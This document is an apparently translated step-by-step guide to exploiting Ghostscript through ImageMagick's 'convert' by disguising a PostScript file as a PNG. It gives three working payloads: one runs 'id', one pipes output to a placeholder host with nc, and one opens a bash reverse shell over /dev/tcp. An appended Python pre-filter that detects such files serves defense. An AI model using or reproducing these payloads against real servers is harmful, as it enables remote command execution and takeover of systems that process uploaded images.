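1. Save the content below as a PNG file (touch 1.png && vi 1.png)
Then run convert 1.png 1.gif
After that you will see that the command was executed: >$ id
(If ImageMagick is not present when testing on Ubuntu, you can install it manually: apt install imagemagick)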
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
If you need a reverse connection via nc, use the following:
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%echo `id` | nc xxx.xxx.xxx.xxx 2333) currentdevice putdeviceprops
For a bash reverse shell, use the following:
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash –i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1) currentdevice putdeviceprops
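
Added example, not part of the original note: a defender-side pre-filter that flags files like the ones above before they are handed to convert. It compares the file's leading bytes with its image extension and looks for the PostScript header, the %pipe% device and /OutputFile; the function name, constants and sample bytes are constructed for illustration.

```python
import re

# Leading bytes for the image types an upload endpoint expects (standard signatures).
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
PS_HEADER = re.compile(rb"^\s*%!")        # "%!PS" header, leading whitespace allowed
PIPE_DEVICE = re.compile(rb"%pipe%")      # Ghostscript pipe pseudo-device
OUTPUT_FILE = re.compile(rb"/OutputFile\b")


def inspect_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons to reject a file; an empty list means no finding."""
    findings = []
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = MAGIC.get(ext)
    # ImageMagick picks the decoder from the content, not the name, so a
    # ".png" that does not start with the PNG signature deserves a closer look.
    if expected is not None and not data.startswith(expected):
        findings.append("extension/magic mismatch")
    if PS_HEADER.search(data[:4096]):
        findings.append("PostScript header")
    if PIPE_DEVICE.search(data):
        findings.append("%pipe% device")
    if OUTPUT_FILE.search(data):
        findings.append("/OutputFile set")
    return findings


# Constructed samples: the first payload from the note above, and a bare PNG signature.
SAMPLE_PS = (
    b"%!PS\nuserdict /setpagedevice undef\nsave\nlegal\n"
    b"{ null restore } stopped { pop } if\n{ legal } stopped { pop } if\nrestore\n"
    b"mark /OutputFile (%pipe%id) currentdevice putdeviceprops\n"
)
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in (("1.png", SAMPLE_PS), ("ok.png", SAMPLE_PNG)):
        print(name, inspect_upload(name, blob) or "clean")
```

Any finding is a reason to reject the file before conversion; the filter complements, and does not replace, restricting the PS/EPS/PDF coders in ImageMagick's policy.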